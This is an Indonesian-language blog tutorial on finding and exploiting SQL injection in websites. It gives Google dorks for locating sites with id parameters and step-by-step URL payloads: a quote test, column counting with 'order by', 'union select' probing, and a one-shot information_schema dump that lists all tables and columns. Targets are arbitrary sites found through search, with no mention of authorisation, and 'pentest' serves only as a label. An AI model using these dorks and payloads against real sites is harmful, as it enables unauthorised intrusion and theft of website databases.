Cara menemukan celah keamanan pada website metode SQL injection

Mr.XxX
January 27, 2021

 Assalamualaikum wr.wb

Selamat pagi dan selamat menikmati liburannya:V

Admin kali ini akan membagikan ilmu lagi:V

Kali ini admin akan membagikan ilmu cara menemukan celah keamanan pada website metode SQL injection.

Bahan yang diperlukan:

1.Dorking google

2.kuota internet

3.Niat tentunya:V

4.Kesabaran:V


Alat untuk ngehek:

1.Hp/laptop/pc

2.Browser


Langsung saja kita mulai step by step untuk menemukan kerentanannya:

Untuk dorkingnya

inurl:shop.php?id=

inurl:product.php?id=

inurl:index.php?id=


Langkah langkah:

1.Dorking dulu ke google,pastekan salah satu dorking tadi ke search engineenya


2.pilih salah satu website yang mau kalian pentest(uji coba keamanannya)


3.jika sudah kalian perhatikan baik² terlebih dulu website kalian sebelum kalian pentest.


4.jika sudah kalian,buka address barnya tambahkan tanda petik (') di belakang parameternya.parameter ialah seperti /index.php?id=.contoh: https://target.com/index.php?id=5'.nah jika dikasih tanda petik dibelakang parameternya maka website akan menampakkan sebuah bug seperti blank/gambar rusak/error halaman websitenya


5.jika sudah tambahkan +order+by+(angka)--+-

dibelakang tanda petik.contoh: https://target.com/index.php?id=5'+order+by+10--+-

Angkanya bebas,tapi disini saya mencontohkan dengan angka 10

Angka tersebut untuk menemukan batas dimana website tersebut error.


6.jika website tersebut mulai error/blanknya diangka 6,kalian ganti +order+by+10--+- menjadi +union+select+1,2,3,4,5--+-

Langkah ini yang akan menampilkan angka togel.angka togel ini dapat kita exploit untuk menampilkan database pada websitenya.


7.jika angka togelnya munculnya angka 4 maka yang kalian exploit ialah diangka 4 tersebut.contoh: https://target.com/index.php?id=5'+union+select+1,2,3,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),5--+-

Exploit itu akan menampilkan sebuah database pada website.

Nah selesai sudah materi kali ini,jika kalian belom paham,kalian bisa lihat video di youtube saya disini

Sekian tutorial dari saya,jika ada pertanyaan silahkan bertanya di kolom komentar

sekian dan terimakasih,waassalammualaikum wr.wb